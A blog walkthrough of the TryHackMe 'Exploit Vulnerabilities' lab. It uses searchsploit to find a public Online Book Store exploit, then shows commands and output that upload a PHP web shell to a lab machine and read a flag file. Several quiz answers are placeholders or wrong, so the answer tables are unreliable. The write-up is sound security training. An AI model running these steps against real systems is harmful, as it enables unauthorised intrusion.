Try Hack Me Exploit Vulnerabilities
@ Animesh Roy | Sunday, Sep 26, 2021 | 7 minutes read | Update at Sunday, Sep 26, 2021

OverView

Exploit Vulnerabilitieslogo
Exploit Vulnerabilities [Subscription Required]Exploit Vulnerabilities

Task 01: Introduction

In this room, we are going to be going over some means of identifying vulnerabilities and coupling our research skills to learn how these can be abused.

Task 02: Automated Vs. Manual Vulnerability Research

There is a myriad of tools and services available in cybersecurity for vulnerability scanning. Ranging from being commercial (and footing a heavy bill) to open-source and free, vulnerability scanners are convenient means of quickly canvassing an application for flaws.

For example, the vulnerability scanner Nessus has both a free (community) edition and commercial. The commercial version costing thousands of pounds for a year’s license will likely be used in organisations providing penetration testing services or audits

I have detailed some of the advantages and disadvantages of using a vulnerability scanner in the table below:

img

Frameworks such as Metasploit often have vulnerability scanners for some modules; this is something you will come onto learn about in a further module in this pathway.

Manual scanning for vulnerabilities is often the weapon of choice by a penetration tester when testing individual applications or programs. In fact, manual scanning will involve searching for the same vulnerabilities and uses similar techniques as automated scanning.

Ultimately, both techniques involve testing an application or program for vulnerabilities. These vulnerabilities include:

img

If you are keen to learn more about these vulnerabilities, the OWASP framework will be a useful read to you.

Flag-02

questionans
You are working close to a deadline for your penetration test and need to scan a web application quickly. Would you use an automated scanner? (Yay/Nay)yay
You are testing a web application and find that you are able to input and retrieve data in a database. What vulnerability is this?injection
You manage to impersonate another user. What vulnerability is this?Broken Access Contrl

Task 03: Finding Manual Exploits

Rapid7

Much like other services such as Exploit DB and NVE, Rapid7 is a vulnerability research database. The only difference being that this database also acts as an exploit database. Using this service, you can filter by type of vulnerability (I.e. application and operating system).

Additionally, the database contains instructions for exploiting applications using the popular Metasploit tool (you will learn about this tool in-depth later in the learning path). For example, this entry on Rapid7 is for “Wordpress Plugin SP Project & Document”, where we can see instructions on how to use an exploit module to abuse this vulnerability.

GitHub

GitHub is a popular web service designed for software developers. The site is used to host and share the source code of applications to allow a collaborative effort. However, security researchers have taken to this platform because of the aforementioned reasons as well. Security researchers store & share PoC’s (Proof of Concept) on GitHub, turning it into an exploit database in this context.

GitHub is extremely useful in finding rare or fresh exploits because anyone can create an account and upload – there is no formal verification process like there is with alternative exploit databases. With that said, there is also a downside in that PoC’s may not work where little to no support will be provided

GitHub uses a tagging and keyword system, meaning that we can search GitHub by keywords such as “PoC”, “vulnerability”, and many more. At the time of writing, there are 9,682 repositories with the keyword “cve”. We are also able to filter the results by programming language.

Searchsploit

Searchsploit is a tool that is available on popular pentesting distributions such as Kali Linux. It is also available on the TryHackMe AttackBox. This tool is an offline copy of Exploit-DB, containing copies of exploits on your system.

You are able to search searchsploit by application name and/or vulnerability type. For example, in the snippet below, we are searching searchsploit for exploits relating to Wordpress that we can use – no downloading necessary!

Flag-03

questionans
What website would you use as a security researcher if you wanted to upload a Proof of Concept?GitHub
You are performing a penetration test at a site with no internet connection. What tool could you use to find exploits to use?searchsploit

Task 04: Example of Manual Exploitation

We can use the information gathered from task 2 in this room to exploit the vulnerable service. Ultimately, one of the most effective vulnerabilities that we can exploit is the ability to execute commands on the target that is running the vulnerable application or service.

For example, being able to execute commands on the target that is running the vulnerable application or service will allow us to read files or execute commands that we previously wouldn’t be able to perform using the application or service alone. Additionally, we can abuse this to gain what is known as a foothold to the machine. A foothold is an access to the vulnerable machine’s console, where we can then begin to exploit other applications or machines on the network.

We are going to use an exploit to perform remote code execution on the application from task 2 to be able to remotely execute commands on the vulnerable machine.

Before we start, it is important to note that exploits rarely come out of the box and are ready to be used. They often require some configuration before they will work for our environment or target. The level of configuration will vary upon the exploit, so you will often find multiple exploits for the same vulnerability on an application. It is up to you to figure out which exploit is the most appropriate or useful to you.

For example, in the snippet below, we can see that a few options have been changed to reflect the IP address of the machine that we are attacking from.

img

img

Once we have configured the exploit correctly, let’s further read this exploit to understand how to use it. In the snippet below, we can see that we need to provide two arguments when running the exploit:

img

With this information in mind, we are now ready to use this exploit on the vulnerable machine. We are going to do the following:

  1. Use the exploit to upload a malicious file to the vulnerable application containing whatever command we wish to execute, where the web server will run this malicious file to execute the code.
  2. The file will first contain a basic command that we will use to verify that the exploit has worked.
  3. Then we are going to read the contents of a file located on the vulnerable machine.

img

img

flag -04

questionans
What type of vulnerability was used in this attack?RCE

Task 05: Practical: Manual Exploitation

Deploy the machine attached to this task and wait a minimum of five minutes for it to be fully set up. After five minutes, visit the webserver running on the machine by navigating to http://MACHINE_IP in the browser of the device connected to the THM network (your own or the AttackBox).

5.1

  • Open IP in web-browser look into footer area:

    img

5.2

  • look for vulnerability:

    searchsploit online book store

--------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title                                                                               |  Path
--------------------------------------------------------------------------------------------- ---------------------------------
GotoCode Online Bookstore - Multiple Vulnerabilities                                         | asp/webapps/17921.txt
Online Book Store 1.0 - 'bookisbn' SQL Injection                                             | php/webapps/47922.txt
Online Book Store 1.0 - Arbitrary File Upload                                                | php/webapps/47928.txt
Online Book Store 1.0 - Unauthenticated Remote Code Execution                                | php/webapps/47887.py
--------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

  • we have a Unauthenticated Remote Code Execution let’s use this to exploit the application.

  • copy the exploit: searchsploit -m php/webapps/47887.py

  • run the exploit:

    python 47887.py http://10.10.18.54
> Attempting to upload PHP web shell...
> Verifying shell upload...
> Web shell uploaded to http://10.10.18.54/bootstrap/img/PQytuI1suX.php
> Example command usage: http://10.10.18.54/bootstrap/img/PQytuI1suX.php?cmd=whoami
> Do you wish to launch a shell here? (y/n): y
RCE $ cat flag.txt
flag{here}

Flag-05

questionans
Find out the version of the application that is running. What are the name and version number of the application?5.1
Now use the resources and skills from this module to find an exploit that will allow you to gain remote access to the vulnerable machine.n\a
Use this exploit against the vulnerable machine. What is the value of the flag located in a web directory?5.2

© 2010 - 2024 Classroom

Reading Stuffs

Social Links

YOU CAN REUSE MY CONTENT